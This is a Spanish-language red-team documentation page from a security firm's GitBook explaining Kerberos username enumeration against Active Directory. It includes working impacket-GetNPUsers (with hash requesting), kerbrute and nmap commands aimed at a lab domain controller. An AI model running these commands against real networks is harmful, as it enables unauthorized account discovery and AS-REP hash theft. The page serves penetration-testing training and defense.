Iron Wolf Security Experts
InicioServicios de CiberseguridadDocumentación técnicaContacto
  • Documentación Técnica
  • Todo sobre un Red Team
    • Qué es un Red Team
    • Red Team VS Test de intrusión
    • Objetivos y Alcance
    • Desarrollo y organización
    • Escenarios y vectores de acceso
    • Equipos y comunicación interna
    • Ventajas y beneficios de un ejercicio de Red Team
  • Técnicas y Ataques
    • Ataques a Directorio Activo
      • Enumeración
        • Enumeración de usuarios Kerberos
      • Kerberos
        • Kerberoasting
        • Password Spraying kerberos
        • AS-REP Roast
        • Constrained delegation
      • Credenciales
        • Dumping Active Directory Hashes - NTDS.dit
  • Cheat Sheet
    • Túneles y conexiones reversas
      • Proxy Socks
      • Chisel
    • PowerShell
      • Encode & decode Base64
      • PortScan
    • Fuerza bruta & Cracking
  • web
    • GraphQL introspección
Powered by GitBook
On this page
  • Descripción
  • Impacket-GetNPUsers
  • Kerbrute
  • Nmap
  • Referencias
  1. Técnicas y Ataques
  2. Ataques a Directorio Activo
  3. Enumeración

Enumeración de usuarios Kerberos

Descripción

La enumeración de usuarios en Kerberos consiste en hacer fuerza bruta al Active Directory mediante un diccionario de usuarios.

Para enumerar los usuario de Kerberos se envía una solicitud TGT sin pre-autenticación Si el KDC responde con el error KDC_ERR_C_PRINCIPAL_UNKNOWN, el nombre de usuario no existe. Sin embargo, si el KDC solicita pre-autenticación, sabemos que el nombre de usuario existe.

Esto no causa ningún error de inicio de sesión, por lo que no bloqueará la cuenta.

Para llevar a cabo la enumeración de usuarios en Kerberos se pueden utilizar las siguientes herramientas:

  • Impacket-GetNPUsers

  • Kerbrute

  • Nmap

La lista de usuarios para la enumeración tiene que tener el siguiente formato:

users.txt
iwolf
papa
administrator
danj
adamb
alans
chrisn
...

Impacket-GetNPUsers

impacket-GetNPUsers atlanta.corp/ -usersfile /home/iwolf/Desktop/users.txt -dc-ip 10.0.0.128 -request

En este caso se ha indicado el falg -request para que, si encuentra una cuenta que no requiere pre-autenticación automaticamente muestre el HASH del usuario.

Kerbrute

./kerbrute userenum --dc 10.0.0.128 -d atlanta.corp /home/iwolf/Desktop/users.txt

Nmap

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='atlanta.corp',userdb=/home/iwolf/Desktop/users.txt 10.0.0.128 -Pn

Referencias

PreviousEnumeraciónNextKerberos

Last updated 3 years ago

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub
GitHub - SecureAuthCorp/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub
Logo
Logo